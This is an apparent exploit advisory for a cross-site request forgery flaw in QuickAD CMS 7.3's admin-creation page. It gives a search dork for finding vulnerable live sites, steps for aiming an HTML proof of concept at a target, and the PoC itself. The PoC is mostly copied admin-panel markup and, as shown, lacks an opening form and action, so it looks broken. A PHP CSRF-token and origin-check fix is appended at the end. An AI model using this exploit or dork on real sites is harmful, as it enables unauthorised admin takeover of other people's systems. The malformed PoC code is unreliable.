`====================================================================================================================================
| # Title : QUICKAD CMS 7.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 |
| # Dork : "Bylancer, All right reserved" |
====================================================================================================================================
PoC :
[+] Search with the dork in Google or another search engine.
[+] The following HTML code creates a new admin.
[+] Go to line 61.
[+] Set the target site link, save the changes and apply.
[+] Affected file : /admin/panel/admin_add.php .
[+] http://127.0.0.1/q7.3/admin/panel/admin_add.php .
[+] Save the code as poc.html .
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<!-- Google fonts -->
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" />
<!-- Page JS Plugins CSS -->
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" />
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" />
<!-- css select2 -->
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" />
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" />
<!-- Zeunix CSS stylesheets -->
<link rel="stylesheet" id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" />
<link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" />
<link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" />
<link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" />
<link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" />
<link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" />
<!-- End Stylesheets -->
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" />
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css">
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css">
<link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" />
<!--alerts CSS -->
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css">
<link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css">
<script>
var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php';
</script>
</head>
<body class="app-ui layout-has-drawer layout-has-fixed-header">
<div class="app-layout-canvas">
<div class="app-layout-container">
<aside class="app-layout-drawer">
<!-- Drawer scroll area -->
<div class="app-layout-drawer-scroll">
<!-- Drawer logo -->
<div id="logo" class="drawer-header">
<main class="app-layout-content">
<!-- Page Content -->
<div class="container-fluid p-y-md">
<!-- Partial Table -->
<div class="card">
<div class="card-header">
<h4>Admin users</h4>
<div class="pull-right">
<a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a>
</div>
</div>
<div class="card-block">
<div id="js-table-list">
<table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable">
<thead>
<tr>
<th class="text-center w-5 sortingNone">
<label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0">
<input type="checkbox" id="check-all" name="check-all"><span></span>
</label>
</th>
<th><i class="ion-image"></i> Admin user</th>
<th class="w-10">Email</th>
<th style="width: 60px;">Actions</th>
</tr>
</thead>
<tbody id="ajax-services">
</tbody>
</table>
</div>
</div>
<!-- .card-block -->
</div>
<!-- .card -->
<!-- End Partial Table -->
</div>
<!-- .container-fluid -->
<!-- End Page Content -->
</main>
<script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<div class="site-action">
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>
</button>
<div class="site-action-buttons">
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">
<i class="icon ion-android-delete" aria-hidden="true"></i>
</button>
</div>
</div>
<div class="col-md-12">
<!-- Site Action -->
<div class="site-action">
<button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button>
<button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating">
<i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i>
<i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i>
</button>
<div class="site-action-buttons">
<button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"
class="btn-raised btn btn-danger btn-floating animation-slide-bottom">
<i class="icon ion-android-delete" aria-hidden="true"></i>
</button>
</div>
</div>
<div class="form-group">
<label for="exampleInputfullname">Full Name<code></code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-person"></i></div>
<input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required="">
<span class="help-block"></span>
</div>
</div>
</div>
<h4 class="box-title">User Login Details</h4>
<hr>
<div class="col-md-12">
<div class="form-group">
<label for="exampleInputuname">Username<code>*</code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-person"></i></div>
<input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required="">
</div>
</div>
</div>
<div class="col-md-12">
<div class="form-group">
<label for="exampleInputEmail1">Email address<code></code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-android-mail"></i></div>
<input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required="">
</div>
</div>
</div>
<div class="col-md-12">
<div class="form-group">
<label for="exampleInputpwd1">Password<code></code></label>
<div class="input-group">
<div class="input-group-addon"><i class="ion-android-lock"></i></div>
<input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required="">
</div>
</div>
</div>
</div>
<div class="row">
</div>
</div>
</form>
</div>
</div>
</div>
<!-- /.row -->
</div>
</div>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
=======================================================================================================================================
`
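A CSRF issue of this kind means the admin-creation endpoint acts on the administrator's session cookie alone, so a form hosted on any other site can submit it. The guard below shows the usual server-side fix: a per-session token plus an origin check. It is an added example, not QuickAD's code or the advisory author's; the helper names, the `csrf_token` field and the `admin.example.test` host are assumptions.

```php
<?php
declare(strict_types=1);
// Added example (hypothetical csrf_guard.php), not QuickAD source. Needs PHP 7.3+.

function start_admin_session(): void
{
    // SameSite=Strict keeps the session cookie off cross-site form posts.
    session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
    session_start();
}

function csrf_token(): string
{
    // One random token per session; print it into a hidden "csrf_token" field.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function same_origin(array $server, string $expectedHost): bool
{
    // Origin is preferred; Referer is the fallback. A missing header fails closed.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

function require_csrf(array $post, array $server, string $expectedHost): void
{
    $sent = $post['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    $ok = ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($server, $expectedHost)
        && is_string($sent) && is_string($known) && $known !== ''
        && hash_equals($known, $sent);   // constant-time comparison
    if (!$ok) {
        http_response_code(403);
        exit('Request rejected');
    }
}

// At the top of the admin-creation handler, before any database write:
start_admin_session();
require_csrf($_POST, $_SERVER, 'admin.example.test'); // assumed admin host name
// ... only now read name, username, email and password from $_POST ...
```

The expected host is passed in from configuration instead of being read from the request's `Host` header, so a forged header cannot satisfy the origin check.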